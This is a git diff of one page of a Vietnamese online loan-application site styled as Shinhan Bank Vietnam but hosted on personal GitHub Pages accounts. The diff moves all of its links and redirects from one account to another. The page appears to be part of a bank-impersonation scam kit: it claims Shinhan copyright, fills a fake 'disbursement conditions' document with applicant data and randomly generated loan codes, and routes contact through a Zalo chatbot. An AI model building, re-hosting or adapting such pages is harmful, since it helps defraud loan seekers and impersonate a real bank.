--- a/pages/vi/step7.html
+++ b/pages/vi/step7.html
@@ -283,12 +283,12 @@
             <div class="dropdown">
                 <i class="bi bi-list" data-bs-toggle="dropdown" aria-expanded="false"></i>
                 <ul class="dropdown-menu dropdown-menu-end">
-                    <li><a class="dropdown-item" href="https://vaytieudung.github.io/shinhanbank/pages/vi/gioi-thieu.html">GIỚI THIỆU</a></li>
-                    <li><a class="dropdown-item" href="https://vaytieudung.github.io/shinhanbank/pages/vi/tham-chieu.html">LỢI ÍCH</a></li>
-                    <li><a class="dropdown-item" href="https://vaytieudung.github.io/shinhanbank/pages/vi/lai-suat-vay.html">GIẤY TỜ CẦN THIẾT</a></li>
-                    <li><a class="dropdown-item" href="https://vaytieudung.github.io/shinhanbank/pages/vi/loan_registration.html">ĐĂNG KÝ TRỰC TUYẾN</a></li>
-                    <li><a class="dropdown-item" href="https://vaytieudung.github.io/shinhanbank/pages/vi/lai-suat-tien-gui.html">XEM KẾT QUẢ</a></li>
-                    <li><a class="dropdown-item" href="https://vaytieudung.github.io/shinhanbank/pages/vi/dieu-khoan-su-dung.html">ĐIỀU KHOẢN SỬ DỤNG</a></li>
+                    <li><a class="dropdown-item" href="https://trum1212.github.io/shinhanbank/pages/vi/gioi-thieu.html">GIỚI THIỆU</a></li>
+                    <li><a class="dropdown-item" href="https://trum1212.github.io/shinhanbank/pages/vi/tham-chieu.html">LỢI ÍCH</a></li>
+                    <li><a class="dropdown-item" href="https://trum1212.github.io/shinhanbank/pages/vi/lai-suat-vay.html">GIẤY TỜ CẦN THIẾT</a></li>
+                    <li><a class="dropdown-item" href="https://trum1212.github.io/shinhanbank/pages/vi/loan_registration.html">ĐĂNG KÝ TRỰC TUYẾN</a></li>
+                    <li><a class="dropdown-item" href="https://trum1212.github.io/shinhanbank/pages/vi/lai-suat-tien-gui.html">XEM KẾT QUẢ</a></li>
+                    <li><a class="dropdown-item" href="https://trum1212.github.io/shinhanbank/pages/vi/dieu-khoan-su-dung.html">ĐIỀU KHOẢN SỬ DỤNG</a></li>
                     <li><a class="dropdown-item" href="https://chatbot.zalo.me/ref/3188631486358378579?id=tin-nhan-chao-mung">LIÊN HỆ</a></li>
                     <li><a class="dropdown-item" href="https://chatbot.zalo.me/ref/3188631486358378579?id=dang-ky-giai-ngan">ZALO</a></li>
                 </ul>
@@ -300,13 +300,13 @@
     <div class="container">
         <ul class="nav-tabs">
             <li class="nav-item">
-                <a class="nav-link" href="https://vaytieudung.github.io/shinhanbank/pages/vi/step1.html">1. Nhập thông tin</a>
+                <a class="nav-link" href="https://trum1212.github.io/shinhanbank/pages/vi/step1.html">1. Nhập thông tin</a>
             </li>
             <li class="nav-item">
-                <a class="nav-link" href="https://vaytieudung.github.io/shinhanbank/pages/vi/step4.html">2. Xác thực và xử lý</a>
+                <a class="nav-link" href="https://trum1212.github.io/shinhanbank/pages/vi/step4.html">2. Xác thực và xử lý</a>
             </li>
             <li class="nav-item">
-                <a class="nav-link active" href="https://vaytieudung.github.io/shinhanbank/pages/vi/step7.html">3. Hoàn thành</a>
+                <a class="nav-link active" href="https://trum1212.github.io/shinhanbank/pages/vi/step7.html">3. Hoàn thành</a>
             </li>
         </ul>
 
@@ -319,26 +319,26 @@
             </div>
             <hr class="divider-blue">
             <div class="button-group">
-                <a href="https://vaytieudung.github.io/shinhanbank/pages/vi/step6.html" class="btn btn-primary">HỢP ĐỒNG VAY</a>
+                <a href="https://trum1212.github.io/shinhanbank/pages/vi/step6.html" class="btn btn-primary">HỢP ĐỒNG VAY</a>
                 <button id="downloadDisbursementBtn" class="btn btn-download">TẢI XUỐNG</button>
-                <a href="https://vaytieudung.github.io/shinhanbank/pages/vi/step8.html" class="btn btn-primary" id="proceedToFinalStepBtn">TIẾP TỤC</a>
+                <a href="https://trum1212.github.io/shinhanbank/pages/vi/step8.html" class="btn btn-primary" id="proceedToFinalStepBtn">TIẾP TỤC</a>
             </div>
         </div>
     </div>
 
     <div class="footer">
         <div class="footer-links">
-            <a href="https://vaytieudung.github.io/shinhanbank/pages/vi/chinh-sach-bao-mat.html">Chính sách bảo mật</a> |
-            <a href="https://vaytieudung.github.io/shinhanbank/pages/vi/dieu-khoan-su-dung.html">Điều khoản sử dụng</a> |
-            <a href="https://vaytieudung.github.io/shinhanbank/pages/vi/dieu-khoan-su-dung.html">Chính sách Cookies</a> |
+            <a href="https://trum1212.github.io/shinhanbank/pages/vi/chinh-sach-bao-mat.html">Chính sách bảo mật</a> |
+            <a href="https://trum1212.github.io/shinhanbank/pages/vi/dieu-khoan-su-dung.html">Điều khoản sử dụng</a> |
+            <a href="https://trum1212.github.io/shinhanbank/pages/vi/dieu-khoan-su-dung.html">Chính sách Cookies</a> |
             <a href="https://shinhan.com.vn/vi/page/chinh-sach-lien-ket.html">Miễn khoản từ chối liên kết bên ngoài</a> |
-            <a href="https://vaytieudung.github.io/shinhanbank/pages/vi/financial-statement.html">Hướng dẫn truy cập web</a> |
+            <a href="https://trum1212.github.io/shinhanbank/pages/vi/financial-statement.html">Hướng dẫn truy cập web</a> |
             <a href="https://shinhan.com.vn/vi/page/sitemap-2.html">Sitemap</a> |
-            <a href="https://vaytieudung.github.io/shinhanbank/pages/vi/dieu-khoan-su-dung.html">Trung tâm bảo mật</a> |
+            <a href="https://trum1212.github.io/shinhanbank/pages/vi/dieu-khoan-su-dung.html">Trung tâm bảo mật</a> |
             <a href="https://online.shinhan.com.vn/global.shinhan">Demo Ngân hàng trực tuyến</a> |
             <a href="https://chatbot.zalo.me/ref/3188631486358378579?id=tin-nhan-chao-mung">Liên hệ</a> |
-            <a href="https://vaytieudung.github.io/shinhanbank/pages/vi/global-shinhan.html">Trang Global Portal</a> |
-            <a href="https://vaytieudung.github.io/shinhanbank/pages/vi/gioi-thieu.html">Giới Thiệu</a>
+            <a href="https://trum1212.github.io/shinhanbank/pages/vi/global-shinhan.html">Trang Global Portal</a> |
+            <a href="https://trum1212.github.io/shinhanbank/pages/vi/gioi-thieu.html">Giới Thiệu</a>
         </div>
         <p class="mt-3">Trung tâm bảo mật | Demo Ngân hàng trực tuyến | Liên hệ | Trang Global Portal | Giới Thiệu</p>
         <p>© 2015 SHINHAN BANK VIETNAM ALL RIGHTS RESERVED.</p>
@@ -417,7 +417,7 @@
                         $('#formError').text('Không tìm thấy hồ sơ đã đăng ký. Vui lòng quay lại bước đăng ký.').show();
                         $('#downloadDisbursementBtn, #proceedToFinalStepBtn').prop('disabled', true);
                         setTimeout(() => {
-                            window.location.href = 'https://vaytieudung.github.io/shinhanbank/pages/vi/loan_registration.html';
+                            window.location.href = 'https://trum1212.github.io/shinhanbank/pages/vi/loan_registration.html';
                         }, 3000);
                     }
                 } else {
@@ -425,7 +425,7 @@
                     $('#formError').text('Không tìm thấy dữ liệu hồ sơ. Vui lòng quay lại bước đăng ký.').show();
                     $('#downloadDisbursementBtn, #proceedToFinalStepBtn').prop('disabled', true);
                     setTimeout(() => {
-                        window.location.href = 'https://vaytieudung.github.io/shinhanbank/pages/vi/loan_registration.html';
+                        window.location.href = 'https://trum1212.github.io/shinhanbank/pages/vi/loan_registration.html';
                     }, 3000);
                 }
             } catch (error) {
@@ -433,7 +433,7 @@
                 $('#formError').text('Lỗi tải dữ liệu. Vui lòng quay lại bước đăng ký.').show();
                 $('#downloadDisbursementBtn, #proceedToFinalStepBtn').prop('disabled', true);
                 setTimeout(() => {
-                    window.location.href = 'https://vaytieudung.github.io/shinhanbank/pages/vi/loan_registration.html';
+                    window.location.href = 'https://trum1212.github.io/shinhanbank/pages/vi/loan_registration.html';
                 }, 3000);
             }
         }
@@ -556,7 +556,7 @@
             canvasFields[7].value = userData.loanCode || generateRandomCode("SHB");
             canvasFields[8].value = userData.loanCode || generateRandomCode("SHB");
 
-            renderCanvas('disbursementCanvas', 'https://raw.githubusercontent.com/vaytieudung/shinhanbank/main/assets/img/dieukiengiayngan.png', 'https://via.placeholder.com/1240x1754?text=Điều+Kiện+Giải+Ngân');
+            renderCanvas('disbursementCanvas', 'https://raw.githubusercontent.com/trum1212/shinhanbank/main/assets/img/dieukiengiayngan.png', 'https://via.placeholder.com/1240x1754?text=Điều+Kiện+Giải+Ngân');
             userData.currentStep = 7;
             saveToLocalStorage();
         };
@@ -571,7 +571,7 @@
             sendApprovalEmail();
             userData.currentStep = 8;
             saveToLocalStorage();
-            window.location.href = 'https://vaytieudung.github.io/shinhanbank/pages/vi/step8.html';
+            window.location.href = 'https://trum1212.github.io/shinhanbank/pages/vi/step8.html';
         });
     </script>
 </body>
